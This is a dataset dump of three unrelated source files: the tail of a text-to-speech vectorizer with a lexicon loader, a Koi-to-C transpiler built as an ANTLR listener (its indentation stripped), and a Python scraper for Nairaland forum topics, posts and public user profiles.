        bos (^) and eos (~) symbols; {...} spans are vectorized as phones."""
        # start with bos token
        vector = [self._sym_to_id["^"]]
        while text:
            # check for curly braces and treat their contents as ipa
            matches = re.match(r"(.*?)\{(.+?)\}(.*)", text)
            # no ipa in this block, vectorize graphemes
            if not matches:
                vector.extend(self._vectorize_text(text))
                break
            # ipa found, vectorize leading text, then phones
            vector.extend(self._vectorize_text(matches.group(1)))
            vector.extend(self._vectorize_phones(matches.group(2)))
            text = matches.group(3)
        # append eos token
        vector.append(self._sym_to_id["~"])
        return np.array(vector, dtype=np.int32)
    def _vectorize_text(self, text: T.Union[str, T.List[str]]) -> T.List[int]:
        """Map graphemes to ids, dropping unknown symbols and the reserved
        characters _, ^ and ~."""
        return [
            self._sym_to_id[c] for c in text if c in self._sym_to_id and c not in "_^~"
        ]
    def _vectorize_phones(self, phones: str) -> T.List[int]:
        """Map IPA phones to ids; phone symbols carry an '@' prefix in the
        model alphabet while spaces pass through unchanged."""
        return self._vectorize_text([f"@{c}" if c != " " else c for c in phones])
def _load_lexicon(path: str) -> T.Dict[str, T.Dict[T.Optional[str], str]]:
    """Parse a tab-separated lexicon file into word -> {POS tag: IPA} mappings.

    Each line is "word<TAB>ipa[,alternatives...][<TAB>pos]". Alternative
    pronunciations after the first comma are discarded, and lines without at
    least a word and a pronunciation column are skipped.
    """
    lexicon: T.Dict[str, T.Dict[T.Optional[str], str]] = defaultdict(dict)
    with open(path, "r") as file:
        for line in file:
            fields = line.strip().split("\t")
            if len(fields) < 2:
                continue  # malformed or empty line: no pronunciation column
            word = fields[0].lower()
            # keep only the first of any comma-separated pronunciations
            ipa = fields[1].split(",")[0].strip()
            pos = fields[2] if len(fields) > 2 else None
            lexicon[word][pos] = ipa
    return lexicon
| StarcoderdataPython |
3201071 | <gh_stars>1-10
import pathlib
import os
from typing import TextIO
from .gen.KoiParser import KoiParser
from .gen.KoiListener import KoiListener
from .sanitize import type_to_c, extract_name, extract_comparisons, extract_paramaters
class KoiTranspiler(KoiListener):
def __init__(self, file: TextIO = None, transpile_locally: bool = True):
# TODO: Change to use the Koi file name
# TODO: Create an associating header
if not file:
pathlib.Path("out").mkdir(exist_ok=True)
self.file = open("out/main.c", "w")
else:
self.file = file
self.transpile_locally = transpile_locally
# Enviroment variables:
# SOY_HOME = A folder named "Soy". This is used to house the Soy install.
# SOY_LIB = A folder in SOY_HOME, called "lib". This is used to house the core and standard libraries for Soy/Koi.
self.file_contents = []
self.current_line = []
self.current_name = ""
self.secondary_name = ""
self.current_class = []
self.variable_dict = {}
self.class_vars = []
self.all_names = []
self.define_name = ""
self.imports = []
self.in_class = False
self.class_id = 0
self.class_name = None
self.in_class_init = False
self.init_place = None
self.quit_function = False
self.points = []
self.loop_name = "index"
self.instance_name = "instance"
def exitProgram(self, ctx:KoiParser.ProgramContext):
for core in ["stdio.h", "limits.h", "stdbool.h", "stddef.h"]:
self.file.write(f"#include <{core}>\n")
# for name in self.all_names:
# self.file.write(f"#undef {name}\n")
for import_ in self.imports:
self.file.write(import_)
if self.define_name != "":
self.file_contents.append([f"\n#define {self.define_name}", "\n#endif"])
self.define_name = ""
self.file.write(" ".join(" ".join(line) for line in self.file_contents))
self.file.close()
def exitLine(self, ctx:KoiParser.LineContext):
# self.file.write(" ".join(self.current_line))
self.file_contents.append(self.current_line)
self.current_line = []
def enterName(self, ctx:KoiParser.NameContext):
if ctx.getText() not in self.all_names:
if type(ctx.parentCtx) in [KoiParser.Function_blockContext, KoiParser.Procedure_blockContext, KoiParser.Enum_blockContext]:
self.define_name = ctx.getText().upper() + "_EXISTS"
self.current_line.insert(0, f"#ifndef {self.define_name}\n")
self.all_names.append(ctx.getText())
if ctx.THIS():
self.current_name = "*" + self.instance_name
else:
self.current_name = ctx.getText()
def enterBlock(self, ctx:KoiParser.BlockContext):
if type(ctx.parentCtx) is not KoiParser.Class_blockContext and type(ctx.parentCtx) is not KoiParser.Init_blockContext:
self.current_line.append("{")
if type(ctx.parentCtx) is KoiParser.For_blockContext:
self.current_line.append(self.secondary_name)
self.current_line.append("=")
self.current_line.append(self.current_name)
self.current_line.append("[")
self.current_line.append(self.loop_name)
self.current_line.append("]")
self.current_line.append(";")
def exitBlock(self, ctx:KoiParser.BlockContext):
if type(ctx.parentCtx) is not KoiParser.Class_blockContext and type(ctx.parentCtx) is not KoiParser.Init_blockContext:
self.current_line.append("}")
def enterImport_stmt(self, ctx:KoiParser.Import_stmtContext):
# TODO: Transpile imported Koi files and store the output in a temporary location then link to that instead
path = os.environ.get("SOY_LIB")
if ctx.CORE():
path += "\\core"
elif ctx.STANDARD():
path += "\\std"
for d in ctx.package_name().folders:
path += "\\" + d.text
last_path = path + "\\" + ctx.package_name().last.text
if os.path.isdir(last_path):
pass
# for f in os.listdir(last_path):
# if f.endswith("c"):
# # TODO: Package/namespace imports
# self.current_line.append("#include")
# self.current_line.append("\"{}\"\n".format((last_path + "\\" + f).replace("\\", "\\\\")))
elif os.path.isfile(last_path + ".koi"):
# A file for C exists with the same name, must be a native thing ¯\_(ツ)_/¯
# TODO: Change this to acknowledge a native function if there is one, and have that point to the C file
if os.path.isfile(last_path + ".c"):
path += "\\" + ctx.package_name().last.text + ".c"
# There's no C file, it must be a Koi file
else:
if self.transpile_locally:
new_path = "\\".join(path.split("\\")[0:-1]) + "\\" + path.split("\\")[-1] + "\\_compiled"
pathlib.Path(new_path).mkdir(exist_ok=True)
else:
new_path = "out"
newest_path = new_path + "\\" + ctx.package_name().last.text + ".c"
if not os.path.isfile(newest_path):
with open(newest_path, "w") as comp_file:
from .transpile import transpile_file
transpile_file(path + "\\" + ctx.package_name().last.text + ".koi", comp_file)
path = comp_file.name
else:
path = newest_path
import_path = "#include"
# self.current_line.append("#include")
if self.transpile_locally:
# self.current_line.append("\"{}\"\n".format(path.replace("\\", "\\\\")))
import_path += "\"{}\"\n".format(path.replace("\\", "\\\\"))
else:
# self.current_line.append("\"{}\"\n".format("".join(path.split("\\")[1:])))
import_path += "\"{}\"\n".format("".join(path.split("\\")[1:]))
self.imports.append(import_path)
def enterFunction_block(self, ctx:KoiParser.Function_blockContext):
self.current_line.append(ctx.returnType.getText())
self.current_name = ctx.name().getText()
if self.in_class:
self.current_name = self.secondary_name + "_" + self.current_name
self.current_line.append(self.current_name)
def enterProcedure_block(self, ctx:KoiParser.Procedure_blockContext):
self.current_line.append("void")
self.current_name = ctx.name().getText()
if self.in_class:
self.current_name = self.secondary_name + "_" + self.current_name
self.current_line.append(self.current_name)
def enterParameter_set(self, ctx:KoiParser.Parameter_setContext):
self.current_line.append("(")
params = []
for i in ctx.parameter():
params.append(i.name().getText())
if self.in_class:
self.current_line.append("const")
self.current_line.append(self.secondary_name)
self.current_line.append("*")
self.current_line.append(self.instance_name)
if len(params) > 0:
self.current_line.append(",")
for p in ctx.parameter():
self.current_line.append(type_to_c(p.type_().getText()))
self.current_line.append(p.name().getText())
if "[]" in p.type_().getText():
self.current_line.append("[]")
if params.index(p.name().getText()) < len(params) - 1:
self.current_line.append(",")
def exitParameter_set(self, ctx:KoiParser.Parameter_setContext):
self.current_line.append(")")
def enterReturn_stmt(self, ctx:KoiParser.Return_stmtContext):
self.current_line.append("return")
if ctx.true_value().value().getText() == "this":
self.current_line.append("*" + self.instance_name)
else:
self.current_line.append(ctx.true_value().getText())
self.current_line.append(";")
def enterFunction_call(self, ctx:KoiParser.Function_callContext):
# print(ctx.getText(), self.variable_dict)
# if ctx.funcName.getText() in ["print", "println"]:
# self.current_line.append("printf")
# else:
# self.current_line.append(ctx.funcName.getText())
class_call = False
if self.quit_function:
self.quit_function = False
return
if type(ctx.parentCtx) is KoiParser.ValueContext:
return
for c in ctx.method_call():
name = c.funcName.getText()
if self.variable_dict.get(name.split(".")[0]):
class_call = True
if class_call:
split = name.split(".")
class_name = split[0]
name = self.variable_dict[class_name] + "_" + name.split(".")[-1]
self.current_line.append(name)
params = extract_paramaters(c.call_parameter_set(), True)
if class_call:
params.insert(1, " ".join(["&" + class_name, ","]))
for p in params:
self.current_line.append(p)
self.current_line.append(";")
# if ctx.funcName.getText() == "println":
# self.current_line.append("printf")
# self.current_line.append("(")
# self.current_line.append("\"\\n\"")
# self.current_line.append(")")
# self.current_line.append(";")
def enterFor_block(self, ctx:KoiParser.For_blockContext):
# FIXME: Fix in-line lists
self.current_name = ctx.name()[0].getText()
self.current_line.append("int")
self.current_line.append(self.loop_name)
self.current_line.append(";")
self.current_line.append(type_to_c(ctx.type_().getText()))
self.current_line.append(self.current_name)
self.current_line.append(";")
self.current_line.append("for")
self.current_line.append("(")
self.current_line.append(self.loop_name)
self.current_line.append("=")
self.current_line.append("0")
self.current_line.append(";")
self.current_line.append(self.loop_name)
self.current_line.append("<")
self.current_line.append("sizeof")
self.current_line.append("(")
if ctx.with_length() is None:
size = ctx.name()[1].getText()
else:
size = ctx.with_length().getText()
self.current_line.append(size)
self.secondary_name = ctx.name()[0].getText()
self.current_line.append(")")
self.current_line.append("/")
self.current_line.append("sizeof")
self.current_line.append("*")
self.current_line.append("(")
self.current_line.append(size)
self.current_line.append(")")
self.current_line.append(";")
self.current_line.append(self.loop_name)
self.current_line.append("++")
self.current_line.append(")")
def enterLocal_asstmt(self, ctx:KoiParser.Local_asstmtContext):
assignment = []
my_type = ""
if ctx.type_():
assignment.append(type_to_c(ctx.type_().getText()))
self.variable_dict[ctx.name().getText()] = type_to_c(ctx.type_().getText())
my_type = ctx.type_().getText()
assignment.append(extract_name(ctx.name().getText(), my_type, self.instance_name))
if ctx.true_value():
if ctx.true_value().value().function_call():
self.quit_function = True
if ctx.true_value().value().class_new():
self.class_name = ctx.name().getText()
assignment.append(";")
else:
if ctx.type_() and "[]" in ctx.type_().getText():
assignment.append("[]")
assignment.append("=")
# if ctx.true_value().value().function_call():
# assignment.append("=")
# assignment.append(ctx.true_value().getText().replace("this.", self.instance_name + "->"))
if ctx.true_value().getText().startswith("["):
assignment.append("{")
assignment.append(extract_name(ctx.true_value().getText()[1:-1], my_type))
assignment.append("}")
else:
if not ctx.true_value().value().class_new():
assignment.append("=")
assignment.append(extract_name(ctx.true_value().getText(), my_type))
assignment.append(";")
if self.in_class_init:
assignment.append(";")
self.class_vars.append(" ".join(assignment))
self.current_class.insert(self.init_place, " ".join(assignment).split("=")[0] + ";")
else:
self.current_line.append(" ".join(assignment))
def exitLocal_asstmt(self, ctx:KoiParser.Local_asstmtContext):
if not self.in_class_init:
self.current_line.append(";")
def enterIf_block(self, ctx:KoiParser.If_blockContext):
self.current_line.append("if")
# self.current_line.append("(")
for i in extract_comparisons(ctx.compa_list(), True):
self.current_line.append(i)
# self.current_line.append(")")
def enterElf_block(self, ctx:KoiParser.Elf_blockContext):
self.current_line.append("else")
self.current_line.append("if")
# self.current_line.append("(")
for i in extract_comparisons(ctx.compa_list(), True):
self.current_line.append(i)
# self.current_line.append(")")
def enterElse_block(self, ctx:KoiParser.Else_blockContext):
self.current_line.append("else")
def enterClass_block(self, ctx:KoiParser.Class_blockContext):
self.current_class.append("typedef")
self.current_class.append("struct")
self.current_class.append("{")
self.init_place = len(self.current_class)
self.current_class.append("}")
self.current_class.append(ctx.name().getText())
self.current_class.append(";")
self.secondary_name = ctx.name().getText()
self.in_class = True
def exitClass_block(self, ctx:KoiParser.Class_blockContext):
self.in_class = False
def enterConstructor_block(self, ctx:KoiParser.Constructor_blockContext):
self.current_line.append("void")
self.current_line.append(self.secondary_name + "_new")
def enterClass_new(self, ctx:KoiParser.Class_newContext):
# TODO: Pass returned information to the next chained method
if self.class_name:
instance_name = self.class_name
else:
self.current_line.append(ctx.className.getText())
instance_name = "c" + str(self.class_id)
self.current_line.append("c" + str(self.class_id))
self.current_line.append(";")
self.class_id += 1
self.current_line.append(ctx.className.getText() + "_init" + "(&" + instance_name + ")")
self.current_line.append(";")
self.current_line.append(ctx.className.getText() + "_new" + "(&" + instance_name + ")")
self.current_line.append(";")
for c in ctx.method_call():
self.current_line.append(ctx.className.getText() + "_" + c.getText().split("(")[0] + "(&" + instance_name + "," + "".join(extract_paramaters(c.call_parameter_set(), False)) + ")")
self.current_line.append(";")
def enterInit_block(self, ctx:KoiParser.Init_blockContext):
self.in_class_init = True
def exitInit_block(self, ctx:KoiParser.Init_blockContext):
self.current_line.append(" ".join(self.current_class))
self.current_line.append("void")
self.current_line.append(self.secondary_name + "_init")
self.current_line.append("(")
self.current_line.append(self.secondary_name)
self.current_line.append("*")
self.current_line.append(self.instance_name)
self.current_line.append(")")
self.current_line.append("{")
new_vars = []
for i in self.class_vars:
split = i.replace("*", "").split(" ")
new_vars.append(self.instance_name)
new_vars.append("->")
new_vars.append(" ".join(split[1:-1]))
new_vars.append(";")
self.current_line.append(" ".join(new_vars))
self.current_line.append("}")
self.current_class = []
self.in_class_init = False
def enterWhen_block(self, ctx:KoiParser.When_blockContext):
self.current_line.append("switch")
self.current_line.append("(")
self.current_line.append(ctx.true_value().getText())
self.current_line.append(")")
self.current_line.append("{")
def exitWhen_block(self, ctx:KoiParser.When_blockContext):
self.current_line.append("}")
def enterIs_block(self, ctx:KoiParser.Is_blockContext):
self.current_line.append("case")
if ctx.half_compa():
if ctx.half_compa().comp.text == "<" or ctx.half_compa().comp.text == "<=":
self.current_line.append("INT_MIN")
self.current_line.append("...")
self.current_line.append(ctx.half_compa().getText().replace("<", "").replace("=", ""))
if "=" not in ctx.half_compa().comp.text:
self.current_line.append("-")
self.current_line.append("1")
elif ctx.half_compa().comp.text == ">" or ctx.half_compa().comp.text == ">=":
self.current_line.append(ctx.half_compa().getText().replace(">", "").replace("=", ""))
if "=" not in ctx.half_compa().comp.text:
self.current_line.append("+")
self.current_line.append("1")
self.current_line.append("...")
self.current_line.append("INT_MAX")
else:
self.current_line.append(ctx.true_value().getText())
self.current_line.append(":")
def exitIs_block(self, ctx:KoiParser.Is_blockContext):
self.current_line.append("break")
self.current_line.append(";")
def enterWhen_else(self, ctx:KoiParser.When_elseContext):
self.current_line.append("default")
self.current_line.append(":")
def exitWhen_else(self, ctx:KoiParser.When_elseContext):
self.current_line.append("break")
self.current_line.append(";")
def enterEnum_block(self, ctx:KoiParser.Enum_blockContext):
# TODO: Move enum values to their own "scope"
self.current_line.append("typedef")
self.current_line.append("enum")
self.current_line.append(ctx.name().getText())
self.current_line.append("{")
for i in ctx.ID():
if i.getText() not in self.all_names:
self.all_names.append(i.getText())
self.current_line.append(i.getText())
self.current_line.append(",")
self.current_line.append("}")
self.current_line.append(ctx.name().getText())
self.current_line.append(";")
def enterStruct_block(self, ctx:KoiParser.Struct_blockContext):
self.current_line.append("typedef")
self.current_line.append("struct")
self.current_line.append(ctx.name().getText())
self.current_line.append("{")
for i in ctx.struct_set():
self.current_line.append(type_to_c(i.type_().getText()))
self.current_line.append(i.name().getText())
self.current_line.append(";")
self.current_line.append("}")
self.current_line.append(ctx.name().getText())
self.current_line.append(";")
| StarcoderdataPython |
1799946 | <filename>nairaland/nairaland.py
from bs4 import BeautifulSoup
import dateparser
import requests
import lxml
class Nairaland:
    def __init__(self, browser):
        """Store the scraper's base URL and the browser used for JS-rendered pages."""
        # `browser` wraps a selenium-style driver (exposes get_url and .driver)
        self.BASE_URL = "https://nairaland.com"
        self.browser = browser
def front_page_topics(self):
soup = BeautifulSoup(requests.get(self.BASE_URL).text, "lxml")
td = soup.find('td', attrs={'class': 'featured w'})
links = td.find_all('a')
output = []
for link in links:
datum = {'url': link['href'], 'title': link.text}
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
output.append(datum)
return {'data': output}
def categories(self, depth=0):
first_beautiful = BeautifulSoup(requests.get(self.BASE_URL).text, 'lxml')
table = first_beautiful.find('table', attrs={"class": "boards"})
links = table.find_all('a')
categories = []
browser = self.browser
for link in links:
if 'class=g' in link['title']:
datum = {
'url': self.BASE_URL+link['href'],
'name': link.text,
'id': browser.get_key_by_value(link.text),
'title': link['title'],
'sub_categories': [],
}
if depth > 0:
datum['title'] = datum['title'].replace('class=g', '')
# print('Nairaland: Visiting ', datum['url'])
browser.get_url(datum['url'])
second_table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
second_beautiful = BeautifulSoup(second_table.get_attribute('innerHTML'), 'lxml')
tds = second_beautiful.find_all('td')
sub_categories = []
total_topics = 0
for td in tds:
datum2 = {}
a = td.find('a')
datum2['url'] = self.BASE_URL+a['href']
datum2['name'] = a.text.strip()
text = td.text
resplit = text.split(':')[0]
datum2['title'] = resplit.split('(')[0]
datum2['topics'] = text[text.find('(') + 1: text.find(')')].replace(' topics','').strip()
try:
total_topics += int(datum2['topics'])
except:
pass
if depth > 1:
browser.get_url(datum2['url'])
third_table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
third_beautiful = BeautifulSoup(third_table.get_attribute('innerHTML'), 'lxml')
tds2 = third_beautiful.find_all('td')
child_sub_categories = []
child_total_topics = 0
for tdd in tds2:
ass = tdd.find_all('a')
for c in ass:
if 'href' not in c:
continue
else:
a = c
datum3 = {}
datum3['url'] = self.BASE_URL + a['href']
datum3['name'] = a.text.strip()
text = tdd.text
resplit = text.split(':')[0]
datum3['title'] = resplit.split('(')[0]
datum3['topics'] = text[text.find('(') + 1: text.find(')')].replace(' topics',
'').strip()
try:
child_total_topics += int(datum3['topics'])
total_topics += child_total_topics
except:
pass
child_sub_categories.append(datum3)
datum2['sub_categories'] = child_sub_categories
datum2['topics'] = child_total_topics
sub_categories.append(datum2)
datum['sub_categories'] = sub_categories
datum['topics'] = total_topics
categories.append(datum)
return {'data': categories}
def trending_topics(self, page=0):
url = self.BASE_URL+'/trending'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
for link in links:
datum = {}
beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
bs = beautiful.find_all('b')
category = bs[0]
a = category.find('a')
datum['category'] = {}
datum['category']['url'] = self.BASE_URL+a['href']
datum['category']['name'] = a.text
topic = bs[1]
b = topic.find('a')
datum['title'] = b.text
datum['url'] = self.BASE_URL+b['href']
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
span = beautiful.find('span')
bs = span.find_all('b')
creator = bs[0]
ac = creator.find('a')
datum['creator'] = {}
datum['creator']['name'] = ac.text
datum['creator']['url'] = self.BASE_URL+ac['href']
datum['posts'] = bs[1].text
datum['views'] = bs[2].text
datum['last_post_time'] = str(dateparser.parse(bs[3].text))
datum['last_post_creator'] = {}
ass = span.find_all('a')
if len(ass) > 1:
lc = ass[1]
datum['last_post_creator']['name'] = lc.text
datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
whole_text = span.text
first_split = whole_text.split(' ')
last_element = first_split[len(first_split)-1]
new_text = whole_text.replace(last_element, '')
if 'views' in new_text:
second_split = new_text.split(' views. ')
else:
second_split = new_text.split(' view. ')
datum['last_post_time'] = str(dateparser.parse(second_split[1]))
trending['data'].append(datum)
return trending
def new_topics(self, page=0):
url = self.BASE_URL+'/topics'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
for link in links:
datum = {}
beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
bs = beautiful.find_all('b')
if not len(bs):
continue
category = bs[0]
a = category.find('a')
datum['category'] = {}
datum['category']['url'] = self.BASE_URL+a['href']
datum['category']['name'] = a.text
topic = bs[1]
b = topic.find('a')
datum['title'] = b.text
datum['url'] = self.BASE_URL+b['href']
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
span = beautiful.find('span')
bs = span.find_all('b')
creator = bs[0]
ac = creator.find('a')
datum['creator'] = {}
datum['creator']['name'] = ac.text
datum['creator']['url'] = self.BASE_URL+ac['href']
datum['posts'] = bs[1].text
datum['views'] = bs[2].text
datum['last_post_time'] = str(dateparser.parse(bs[3].text))
datum['last_post_creator'] = {}
ass = span.find_all('a')
if len(ass) > 1:
lc = ass[1]
datum['last_post_creator']['name'] = lc.text
datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
whole_text = span.text
first_split = whole_text.split(' ')
last_element = first_split[len(first_split)-1]
new_text = whole_text.replace(last_element, '')
if 'views' in new_text:
second_split = new_text.split(' views. ')
else:
second_split = new_text.split(' view. ')
datum['last_post_time'] = str(dateparser.parse(second_split[1]))
trending['data'].append(datum)
return trending
def recent_posts(self, page=0):
    """Scrape the Nairaland "recent posts" listing.

    :param page: zero-based page number of the listing; pages > 0 are
        appended to the URL as a path segment.
    :return: dict with ``meta`` pagination info and ``data``, a list of
        post dicts (content, likes, shares, date_posted, user, topic).
    """
    url = self.BASE_URL + '/recent'
    if page > 0:
        url = url + '/' + str(page)
    browser = self.browser
    browser.get_url(url)
    trending = {}
    trending['meta'] = {}
    pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
    table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
    links = table.find_elements_by_tag_name('tr')
    anchors = pagination.find_elements_by_tag_name('a')
    # The original branched on `page < len(anchors)` but assigned the same
    # value in both branches; the dead conditional is collapsed here.
    trending['meta']['next_page'] = page + 1
    trending['meta']['page'] = page
    trending['meta']['per_page'] = len(links)
    if page > 0:
        trending['meta']['previous_page'] = page - 1
    else:
        trending['meta']['previous_page'] = page
    trending['meta']['total_pages'] = len(anchors)
    trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
    trending['data'] = []
    beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
    headings = beautiful.find_all("td", class_="bold l pu")
    posts = beautiful.find_all("td", class_="l w pd")
    for l in range(len(posts)):
        data = {}
        data['content'] = posts[l].text
        try:
            # Likes/shares live in two <b> tags inside the post's <p>.
            p = posts[l].find('p')
            bs = p.find_all('b')
            data['likes'] = int(bs[0].text)
            data['shares'] = int(bs[1].text)
        except Exception:  # stats paragraph missing or malformed
            data['likes'] = 0
            data['shares'] = 0
        a_s = headings[l].find_all('a')
        # Timestamp is in the heading's <span>, parsed leniently.
        try:
            span = headings[l].find('span')
            split = span.text
            data['date_posted'] = str(dateparser.parse(split.rstrip()))
        except Exception:  # no timestamp span on this heading
            data['date_posted'] = None
        data['user'] = {}
        data['topic'] = {}
        data['topic']['category'] = {}
        for a in a_s:
            if a.has_attr('class'):
                # Anchors with a class attribute are the author link.
                data['user']['url'] = self.BASE_URL + str(a['href'])
                data['user']['name'] = a.text
                continue
            if a.has_attr('href'):
                if '#' in a['href']:
                    # Fragment links point at the post inside its topic.
                    data['topic']['url'] = self.BASE_URL + str(a['href'])
                    splitted = a['href'].split('/')
                    data['topic']['id'] = splitted[1]
                    data['topic']['title'] = a.text.replace('Re: ', '')
                    split = data['topic']['url'].split('#')
                    data['url'] = split[0]
                    data['id'] = split[1]
                else:
                    data['topic']['category']['url'] = self.BASE_URL + a['href']
                    data['topic']['category']['name'] = a.text
                continue
        trending['data'].append(data)
    return trending
def user(self, username):
    """Scrape a member's profile page.

    :param username: the Nairaland username (used directly in the URL).
    :return: ``{'data': {...}}`` with name, url, followers, profile fields
        (gender, location, twitter, ...) and post/topic counts.
    """
    url = self.BASE_URL+'/'+username
    browser = self.browser
    browser.get_url(url)
    user = {}
    user['name'] = username
    user['url'] = url
    user['sections_most_active_in'] = []
    # table[3] holds the profile details, table[4] the followers list
    # -- assumes the profile page layout; verify against the live site.
    board = browser.driver.find_element_by_xpath('/html/body/div/table[3]')
    followers = browser.driver.find_element_by_xpath('/html/body/div/table[4]')
    ps = board.find_elements_by_tag_name('p')
    follows = followers.find_elements_by_tag_name('a')
    user['follower_count'] = len(follows)
    user['followers'] = []
    for follow in follows:
        datum = {}
        datum['name'] = follow.text
        datum['url'] = follow.get_attribute('href')
        user['followers'].append(datum)
    # Default optional profile fields to None so absent paragraphs still
    # leave a predictable key set.
    # NOTE(review): 'last_seen' is not defaulted like the others, so the
    # key is missing when the paragraph is absent -- confirm if intended.
    user['gender'] = None
    user['location'] = None
    user['twitter'] = None
    user['personal_text'] = None
    user['time_spent_online'] = None
    user['time_registered'] = None
    user['signature'] = None
    user['post_count'] = None
    user['topic_count'] = None
    # Each profile attribute is a <p> whose text starts with a label;
    # strip the label prefix to get the value.
    for p in ps:
        if 'Gender' in p.text:
            user['gender'] = p.text.replace('Gender: ', '').strip()
        if 'Location' in p.text:
            user['location'] = p.text.replace('Location: ', '').strip()
        if 'Twitter' in p.text:
            user['twitter'] = p.text.replace('Twitter: ', '').strip()
        if 'Personal text' in p.text:
            user['personal_text'] = p.text.replace('Personal text: ', '').strip()
        if 'Time registered' in p.text:
            user['time_registered'] = str(dateparser.parse(p.text.replace('Time registered: ', '').strip()))
        if 'Last seen' in p.text:
            user['last_seen'] = str(dateparser.parse(p.text.replace('Last seen: ', '').strip()))
        if 'Time spent online' in p.text:
            user['time_spent_online'] = p.text.replace('Time spent online: ', '').strip()
        if 'Signature' in p.text:
            user['signature'] = p.text.replace('Signature: ', '').strip()
        if 'Sections Most Active In: ' in p.text:
            # Re-parse the paragraph HTML to pull out the section links.
            beautiful = BeautifulSoup(p.get_attribute('innerHTML'), 'lxml')
            anchors = beautiful.find_all('a')
            for a in anchors:
                section = {}
                section['url'] = self.BASE_URL+a['href']
                section['name'] = a.text
                user['sections_most_active_in'].append(section)
        if p.find_elements_by_tag_name('a'):
            # Post/topic counts appear as link text like "posts (123)".
            liinks = p.find_elements_by_tag_name('a')
            for li in liinks:
                if 'posts' in li.text:
                    user['post_count'] = li.text.split('(')[1].split(')')[0]
                if 'topics' in li.text:
                    user['topic_count'] = li.text.split('(')[1].split(')')[0]
    return {'data': user}
def user_posts(self, username, page=0):
    """Scrape one page of a member's posts.

    :param username: Nairaland username whose posts to fetch.
    :param page: zero-based page number.
    :return: dict with ``meta`` pagination info and ``data``, a list of
        post dicts (content, likes, shares, date_posted, user, topic).
    """
    url = self.BASE_URL+'/'+username+'/posts'
    if page > 0:
        url = url+'/'+str(page)
    browser = self.browser
    browser.get_url(url)
    trending = {}
    trending['meta'] = {}
    pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
    table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
    links = table.find_elements_by_tag_name('tr')
    anchors = pagination.find_elements_by_tag_name('a')
    trending['meta'] = {}
    # NOTE(review): both branches assign the same next_page value; the
    # else branch was presumably meant to clamp at the last page.
    if page < len(anchors):
        trending['meta']['next_page'] = page + 1
    else:
        trending['meta']['next_page'] = page + 1
    trending['meta']['page'] = page
    trending['meta']['per_page'] = len(links)
    if page > 0:
        trending['meta']['previous_page'] = page - 1
    else:
        trending['meta']['previous_page'] = page
    trending['meta']['total_pages'] = len(anchors)
    trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
    trending['data'] = []
    beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
    headings = beautiful.find_all("td", class_="bold l pu")
    posts = beautiful.find_all("td", class_="l w pd")
    # print(f'[BeautifulSoup] Found {len(posts)} posts.')
    trending['data'] = []
    for l in range(len(posts)):
        # if keyword not in posts[l].text:
        #     continue
        data = {}
        data['content'] = posts[l].text
        try:
            # Likes/shares are the first two <b> tags in the post's <p>.
            p = posts[l].find('p')
            bs = p.find_all('b')
            data['likes'] = int(bs[0].text)
            data['shares'] = int(bs[1].text)
        except:
            data['likes'] = 0
            data['shares'] = 0
        a_s = headings[l].find_all('a')
        # get date time
        try:
            span = headings[l].find('span')
            split = span.text
            data['date_posted'] = str(dateparser.parse(split.rstrip()))
        except:
            data['date_posted'] = None
        data['user'] = {}
        data['topic'] = {}
        data['topic']['category'] = {}
        for a in a_s:
            if a.has_attr('class'):
                # Anchors with a class attribute are the author link.
                data['user']['url'] = self.BASE_URL + str(a['href'])
                data['user']['name'] = a.text
                continue
            if a.has_attr('href'):
                if '#' in a['href']:
                    # Fragment links identify the post within its topic.
                    data['topic']['url'] = self.BASE_URL + str(a['href'])
                    splitted = a['href'].split('/')
                    data['topic']['id'] = splitted[1]
                    data['topic']['title'] = a.text.replace('Re: ', '')
                    split = data['topic']['url'].split('#')
                    data['url'] = split[0]
                    data['id'] = split[1]
                else:
                    data['topic']['category']['url'] = self.BASE_URL + a['href']
                    data['topic']['category']['name'] = a.text
                continue
        trending['data'].append(data)
    return trending
def user_topics(self, username, page=0):
    """Scrape one page of topics started by a member.

    :param username: Nairaland username whose topics to fetch.
    :param page: zero-based page number.
    :return: dict with ``meta`` pagination info and ``data``, a list of
        topic dicts (title, url, category, creator, posts, views, ...).
    """
    url = self.BASE_URL+'/'+username+'/topics'
